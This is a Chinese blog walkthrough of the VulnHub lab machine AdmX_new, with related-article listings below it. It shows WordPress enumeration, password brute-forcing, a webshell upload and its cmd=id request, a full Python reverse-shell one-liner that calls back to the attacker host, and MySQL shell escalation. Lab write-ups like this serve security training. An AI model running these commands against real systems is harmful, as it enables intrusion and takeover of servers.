AdmX_new靶场

最新推荐文章于 2024-07-10 21:37:49 发布
最新推荐文章于 2024-07-10 21:37:49 发布
阅读量164 收藏 1
点赞数
分类专栏: vulnhub靶场 文章标签: java 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zjxxxy/article/details/131230807
版权

一、靶场介绍

1.下载地址:https://download.vulnhub.com/admx/AdmX_new.7z
2.将靶机网络适配器改为NAT模式
3.启动靶机

二、信息收集

1.主机发现

nmap -sn 192.168.111.1/24

在这里插入图片描述
2.端口扫描

nmap -A 192.168.111.136 -p 1-65535

在这里插入图片描述
3.目录扫描

feroxbuster --url http://192.168.111.136

这里图片忘记截了
在这里插入图片描述
4.网页访问
在这里插入图片描述

三、渗透流程

1.页面访问慢,查看请求都指向了192.168.159.145
在这里插入图片描述
2.利用BP,将地址进行替换,再重新访问
在这里插入图片描述
在这里插入图片描述
3.利用wpscan爆出用户名admin

wpscan --url http://10.0.2.7/wordpress --enumerate

在这里插入图片描述
4.利用BP爆破admin密码
在这里插入图片描述
在这里插入图片描述
5.在/wordpress/wp-admin使用admin/adam14进行登录
在这里插入图片描述
6.上传.zip木马文件
在这里插入图片描述
网页尝试访问

http://192.168.111.136/wordpress/wp-content/plugins/1.php?cmd=id

在这里插入图片描述
7.kali开启监听,网页执行shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.111.129",7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn(["/bin/bash"])'

在这里插入图片描述
在这里插入图片描述
反弹成功
在这里插入图片描述
8.查看当前用户权限
在这里插入图片描述
9.尝试访问权限目录
在这里插入图片描述
10.获取root权限,提权成功

\! /bin/bash

在这里插入图片描述

zjxxxy
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
t6AdmX_new靶机
08-03
t6AdmX_new靶机
Windows ADMX/ADML
08-05
包括 Windows 8.1 及以上,Windows Server 2012 R2 及以上,所有 Windows 系统的 ADMX/ADML 模板文件,用于部署组策略管理模板。参考文档: https://mp.csdn.net/mp_blog/creation/editor/126182767。
AdmX_new靶机打靶过程及思路
qq_52610024的博客
04-11 2461
pty.spawn(“/bin/bash”)’利用数据库密码登录wpadmin发现失败,开始登录数据库,mysql-uadmin-pWp-Admin#123。sudo发现一个文件有sudo权限,使用命令输入最开始的密码,登录进的数据库拥有root权限,思考使用数据库提权,查看wp-config.php下的数据库账号密码,尝试密码复用的可能性,想到最开始的登录界面的管理员账号密码,拿过来尝试su发现成功,获取到第一个flag文件。9.仍然尝试在404页面插入一句话木马,用蚁剑连接获得新的shell,...
AdmX_new靶机
weixin_45691672的博客
06-16 577
实验主机:AdmX_new靶机一台/Kali linux攻击机一台AdmX_new靶机 IP:192.168.3.9Kali linux攻击机 IP:192.168.3.32实验网络:桥接模式实验目标:获取靶机的Root权限。
kali之vulnhub,Admx_new
weixin_54431413的博客
05-11 651
一、靶场环境部署 二、主机发现 三、端口扫描 四、服务版本扫描 五、登录开启的服务端口 六、进行目录扫描 七、暴力破解 八、利用wordpress后台 九、拿下wpadmin的shell
VulnHub-AdmX_new靶机渗透详解
大熊
06-16 207
BP自动替换、另类提权方法
AdmX_new靶机渗透过程
捣蛋鬼
04-02 4916
文章目录前言一、主机发现/端口扫描二、路径爆破/匹配替换三、密码爆破获得admin密码四、漏洞利用五、密码重用/MySQL提权总结 前言 靶机地址:https://download.vulnhub.com/admx/AdmX_new.7z 难度:中(2个flag和root权限) kali:10.0.2.4 靶机:10.0.2.7 192.168.159.145
EvergreenAdmx:使Admx文件保持最新状态的脚本
05-27
长荣Admx 部署了多个Windows Virtual Desktop环境后,我决定不再希望手动下载所需的Admx文件,而是想要一种使它们保持最新状态的方法。 该脚本解决了两个问题。 检查存在的Admx文件的较新版本,并在找到新版本时进行...
horizon vdm_agent.admx代理组策略模板
12-05
【标题】"Horizon VDM-Agent.admx代理组策略模板"是Vmware云桌面解决方案中的一个重要组成部分,主要用于管理和配置Horizon View桌面虚拟机的行为。这个模板适用于Horizon 7.3.2及其以下版本,虽然它可能也兼容更高...
Firefox ADMX-开源
07-01
Firefox ADMX 是一种允许通过 Active Directory 中的组策略和管理模板在 Firefox 中集中管理锁定和/或默认设置的方法。 Firefox ADMX 是 Mark Sammons 的 Firefox ADM 的延续。
Admx_new
果粒程
11-22 379
Admx_new
Vulnhub--AdmX_new
weixin_45168704的博客
06-15 211
AdmX_new攻略
Admx_new靶机之BurpSuite内容替换、MSF漏洞利用、Wordpress后台漏洞利用、蚁剑上线、利用MySQL提权
qq_40898302的博客
05-12 529
1) Ctrl + Z 将shell放置后台 2) 输入 stty raw -echo 3) 输入 fg 将后台进程调用到前台 4) 关闭所有程序 5) 确定kali有bash ls /bin/bash 6) 将 zsh 改成 bsh sudo chsh -s /bin/bash 7) 重启 8) 输入 echo $SHELL 显示 /bin/bash 成功 9) 重新监听。有的系统漏洞只能触发一次,所以打点成功,基于这个shell获取更多的shell,利用多种方式,多种途径去获得更多的shell。
AdmX_new打靶记录
wwd180的博客
06-16 109
实验主机:攻击机kali(192.168.109.131)靶机AdmX_new(192.168.109.134)实验目标:获取root权限 + 2 flag实验网络:NAT。
Vulnhun_ADMX: 1.0.1
qq_45434762的博客
05-16 367
主机信息kali: 192.168.254.135 ADMX:: 192.168.254.159 信息收集通过nmap扫描目标主机发现只开放了80端口nmap -T4 -p- -A -v...
vulnhub靶场-AdmX
qq_42947816的博客
05-29 1302
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
配置Java开发环境
最新发布
Broken_x的博客
07-10 1078
Java开发环境配置
关于static定义初始化块和静态变量以及初始化块的执行顺序问题
你我约定有三的博客
07-08 285
第二步:在类加载的时候,按照从上到下执行static修饰的代码,此时执行static Test2 test1 = new Test2(),也就是创建出一个名为test1的对象。第六步:此时除了main方法,所有由static修饰的代码全部执行完毕(static修饰的代码只执行一次),类初始化完成,开始执行main方法,main方法中只有一条语句(中的代码,此时输出aa以及a的值(由于第一步没赋初值,并且给了默认值为0 所以输出0)//首先输出a的值为10 然后输出bb,最后将a的值定义为11。
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
小明的Java问道之路
07-08 1804
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
apphvsi.admx
09-01
apphvsi.admx是一种用于管理应用虚拟化的Windows组策略模板文件。组策略是Windows操作系统中的一种集中管理和配置计算机和用户设置的工具。使用apphvsi.admx文件,管理员可以在组策略中定义和配置应用虚拟化相关的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值